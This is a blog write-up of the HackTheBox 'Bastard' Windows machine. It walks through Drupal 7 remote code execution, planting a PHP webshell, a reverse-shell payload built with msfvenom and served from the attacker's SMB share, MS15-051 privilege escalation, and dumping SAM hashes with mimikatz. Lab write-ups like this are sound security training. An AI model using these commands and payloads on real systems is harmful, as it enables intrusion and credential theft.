Finn Lestrange

Finn Lestrange

Computer Science Student.

HTB - Bastard Writeup - 10.10.10.9

4 minute read

bastard

HackTheBox - Bastard - 10.10.10.9

Bastard is a medium rated Windows Server 2008 R2 machine on hackthebox.eu.

Summary

Bastard is not overly challenging, however it requires some knowledge of PHP in order to modify and use the proof of concept required for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems.

Recon and Scanning

Nmap Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

Nmap 7.80 scan initiated Fri May 1 10:06:33 2020 as: nmap -sC -sV -oA nmap/bastard 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.052s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|\_/LICENSE.txt /MAINTAINERS.txt
|\_http-server-header: Microsoft-IIS/7.5
|\_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

From the ports shown here I can see that this is a Windows Box running IIS 7.5, meaning that we are dealing with a Windows Server 2008 R2 box.

Drupal Exploit

The fact that Drupal 7 is also listed bring to mind this exploit for Drupal 7.x CMS applications, allowing unauthenticated remote code execution. For the script to work we need to know the rest endpoint and the ip of the server, to find the rest endpoint I will use GoBuster with the dirbuster directory-list-2.3-medium.txt wordlist.

exploit-parms

Directory Busting to find the REST endpoint

gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

rest

Bingo, we now have the url of the rest endpoint, /rest now we can download the exploit script and fill in the necessary paramaters.

Getting a Shell as iusr

Firstly we will need to download the php-curl library from apt, this can be done with:

1

sudo apt install php-curl

Next, we need to modify the script from Exploit DB to include the rest endpoint, the ip of Bastard, the name of the php webshell to be placed and the contents of that php file, below are the values that I used.

script

Specifically I changed the contents of the webshell to be,

1

<?php echo system($_GET["cmd"]); ?>

This will give us a nicer shell.

Running the Exploit

Now that we have modified our PHP script, we can run it with the following command:

1

php Drupal-Exploit.php

webshell-1

Now if we visit the given URL and append ?cmd=whoami, we can see that we have a shell as nt authority\iusr

webshell-1

Priv Esc to Administrator

Generating a Meterpreter Payload

To start things of, I will generate a executable meterperter payload so that we can get a meterpreter session instead of this PHP webshell.

The command to generate a .exe payload is:

1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.23 LPORT=4567 -f exe > msf.exe
  • Replacing LHOST with your HTB IP
  • Replacing LPORT with a port of your choosing

msf-1

Setting Up Metasploit

To get a Meterpreter session we first need to upload our msf.exe file to the server, for this I will use Impacket’s smbserver.py to spin up a smb share in our current working directory, then we will use the Windows copy command to get the file onto the machine.

To start a SMB Server simply run:

1

smbserver.py evilshare /root/htb/boxes/Bastard/

smb-server

Now that the smb server is running we can enter copy \\10.10.14.23\evilshare\msf.exe msf.exe into our PHP webshell.

smb-2

We can then open Metasploit console and use exploit/multi/handler to recieve the callback from our payload

msf-2

Next, set the payload to the same as the one from msfvenom, windows/x64/meterpreter/reverse_tcp

  • Set LHOST to your HTB IP
  • Set LPORT to the one from MSFVenom
  • Now type exploit to start the listner

msf-options

Popping a Meterpreter Shell

Now that the listner is running, we can go back to our webshell and simply enter the msf.exe command like this:

msf-4

Bingo! We got a Meterpreter Shell!

IUser to SYSTEM

Windows Exploit Suggester

As this is an older version of Windows Server, we will first load up the post/multi/recon/local_exploit_suggester to get a list of possible priv-escs

1
2
3

use post/multi/recon/local_exploit_suggester
set SESSION <meterpreter session ID>
run

msf-5

Unluckily, the exploit we need is not here, this is the exploit we need I found this out by trial and error as the system is an unpatched version of Server 2008 R2 it will be vulnerable to this exploit.

MS15-051 Metasploit Module

Luckily for us, Metasploit has a module for MS15-051, exploit/windows/local/ms15_051_client_copy_image

ms15

The parameters we need to set are:

  • LHOST, our HTB IP
  • LPORT, a local port of your choosing
  • SESSION, our Meterpreter sesison number
  • TARGET, 1 as we are attacking 64 bit Windows

ms15-1

A Meterpreter Session as SYSTEM

Now the options are set we can type exploit and wait for a reverse connection

bingo

Nice, we now have a shell as SYSTEM

User and Root Flags

We can also now get the root and user flags.

1
2

type \users\dimitris\desktop\user.txt
type \users\administrator\desktop\root.txt.txt

flags

Beyond Root

Now that we have rooted the machine we can load the Mimikatz Meterpreter module and dump the SAM hashes.

1
2

load mimikatz
mimikatz_command -f samdump::hashes

hashes

Pwned

pwned

Respect

If you enjoyed the write up or found it useful consider + repping my htb profile linked below:

HTB